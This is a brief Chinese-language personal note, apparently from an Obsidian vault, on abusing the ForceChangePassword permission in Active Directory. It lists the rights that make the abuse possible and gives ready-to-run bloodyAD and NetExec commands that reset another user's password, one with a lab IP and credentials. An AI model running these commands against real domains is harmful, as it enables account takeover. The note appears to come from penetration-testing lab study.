2.ForceChangePassword

created: "2025-05-25 23:55"
tags:
  - AD域
  - DACL_abuse
Type:
  - Note
aliases:
  - ForceChangePassword
updated: "2025-10-27 23:48"

1. 利用

1.1. 利用条件

当控制目标具有 GenericAll 、 AllExtendedRights 或 User-Force-Change-Password 目标用户的对象时，可能会发生这种滥用行为。
如： Pasted image 20250627134005

1.2. 利用工具

1.2.1. bloodyAD

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"

nxc smb 10.129.33.218 -u Caroline.Robinson -p 'BabyStart123!'   -M change-password -o NEWPASS=Admin123

Pasted image 20250628162311